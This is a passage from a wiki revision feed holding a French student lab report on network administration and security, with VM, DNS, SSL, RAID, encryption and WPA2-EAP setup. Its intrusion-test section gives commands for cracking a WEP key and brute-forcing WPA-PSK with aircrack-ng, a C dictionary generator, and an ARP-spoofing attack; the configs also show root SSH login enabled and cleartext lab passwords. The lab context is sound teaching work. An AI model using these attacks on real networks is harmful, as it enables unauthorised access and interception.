                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group3 }&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne suivante afin de définir le protocole de communication&lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Et on peut lancer notre freeradius&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==== DHCP ====&lt;br /&gt;
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.&lt;br /&gt;
&lt;br /&gt;
6509E&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
C9200&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;br /&gt;
&lt;br /&gt;
== Ferme de serveur ==&lt;br /&gt;
&lt;br /&gt;
Ajout du bridge bridgeStudents sur la VM (fichier .cfg)&lt;br /&gt;
&lt;br /&gt;
commande installation python :&lt;br /&gt;
 ansible -i clavaire.ini -m raw -a &amp;quot;apt install python -y&amp;quot; all --user root --ask-pass&lt;br /&gt;
&lt;br /&gt;
commande envoi clé ssh :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; ansible -i clavaire.ini -m authorized_key -a 'user=root state=present key=&amp;quot;{{lookup(&amp;quot;file&amp;quot;,&amp;quot;/root/.ssh/id_rsa.pub&amp;quot;)}}&amp;quot;' --user root --ask-pass all&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dockerfile&lt;br /&gt;
&lt;br /&gt;
 FROM httpd&lt;br /&gt;
 COPY ./index.html /usr/local/apache2/htdocs/&lt;br /&gt;
 CMD [ &amp;quot;httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot; ]&lt;br /&gt;
&lt;br /&gt;
 docker build -t web .&lt;br /&gt;
&lt;br /&gt;
 docker run -d web&lt;br /&gt;
&lt;br /&gt;
fichier main.yml&lt;br /&gt;
&lt;br /&gt;
 ---&lt;br /&gt;
 - name: &amp;quot;Install docker on host&amp;quot;&lt;br /&gt;
   hosts: Install_docker&lt;br /&gt;
   remote_user: root&lt;br /&gt;
   vars :&lt;br /&gt;
           &amp;quot;ansible_distribution&amp;quot;: &amp;quot;Debian&amp;quot;&lt;br /&gt;
           &amp;quot;ansible_distribution_release&amp;quot;: &amp;quot;buster&amp;quot; &lt;br /&gt;
   roles:&lt;br /&gt;
           - role: geerlingguy.docker&lt;br /&gt;
 &lt;br /&gt;
 - name: &amp;quot;Setup Docker&amp;quot;&lt;br /&gt;
   hosts: HTTPD&lt;br /&gt;
   remote_user: root&lt;br /&gt;
   roles:&lt;br /&gt;
           - role: HTTPD&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54810</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54810"/>
				<updated>2020-12-17T11:45:06Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Ferme de serveur */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
